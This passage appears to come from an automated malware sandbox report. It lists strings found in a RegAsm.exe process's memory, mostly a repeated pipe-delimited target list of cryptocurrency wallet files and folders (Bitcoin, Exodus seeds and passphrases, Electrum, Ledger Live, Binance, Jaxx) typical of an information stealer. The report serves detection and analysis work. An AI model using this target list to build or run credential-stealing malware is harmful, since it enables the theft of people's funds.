Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 0000000F.00000002.2759155964.000000000048F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: RegAsm.exe String found in binary or memory: exodus.conf.json
Source: RegAsm.exe String found in binary or memory: \Exodus\
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 0000000F.00000002.2759155964.000000000048F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe String found in binary or memory: \Exodus\
Source: RegAsm.exe, 0000000F.00000002.2763045880.000000000148F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
